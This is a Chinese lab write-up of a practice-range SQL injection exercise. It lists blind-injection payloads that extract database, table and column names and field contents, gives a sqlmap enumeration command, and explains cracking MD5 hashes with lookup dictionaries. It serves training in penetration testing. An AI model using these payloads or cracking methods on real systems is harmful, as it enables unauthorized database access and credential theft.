墨者学院 |
您所在的位置:网站首页 › sql手工注入详细教程图片 › 墨者学院 |
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 红框为靶场入口 判断库名的长度 再后面加上/new_list.php?id=1 and length(database())=1,内容显示空白,我们把1改为2,以此类推,当 length(database())=10的时候,页面就会正常显示,则表明,库名的长度为10. 往后还可以通过bp爆表名,字段,字段内容,数据等,但过程过于繁琐没有做到,有空可能会更新上。有兴趣可以自己尝试,大概方法和爆库名如出一致。 爆表名: /new_list.php?id=1 and substr((select table_name from information_schema.tables where table_schema=‘stormgroup’ limit 0,1),1,1))=‘m’ --+ 爆字段: /new_list.php?id=1 and length((select column_name from information_schema.columns where table_name=‘member’ and table_schema=‘stormgroup’ limit 0,1))=4 --+ 爆字段内容: /new_list.php?id=1 and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))=109 方法二:通过sqlmap软件,对库名进行爆破。 此方法运用到sqlmap工具,此工具是专门用来爆破说起来数据库的,方便,快捷,而且输入格式简单。相比用一个一个字母去爆破,省时省力。 (1)先打开sqlmap,输入sqlmap.py -u “http://219.153.49.228:40668/new_list.php?id=1” --dbs,然后系统会自动爆破库名。 红框处就是爆破出来的所有库名,其中stormgroup便是我们之前得出的库名。 注意:每次开启靶场的端口号都不一样,记得 修改端口号!!!修改端口号!!!修改端口号!!! 别像我一样吃了大亏 MD5密码将不同位数的数字,字符,字母通过算法转化成一定位数的密文,此密文无法逆向验算,即密文无法通过一定算法逆向推到成原明文。MD5加密看是很安全,但是仍然有缺陷,既是同样明文验算出来的密文是一定的,例如用MD5加密123456,则无论试多少次,123456加密出来的结果都是相同的。所以,我们可以制作一本字典,把所有数字,字母的组合方式和对应的MD5码对应在一起,当你要破解时只要找到在字典中相同的MD5码,再对应上明文,这样就破解出来了,所以MD5码实则并不安全,放在网上分分钟被破解。 最后附上sqlmap的操作输入格式: |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |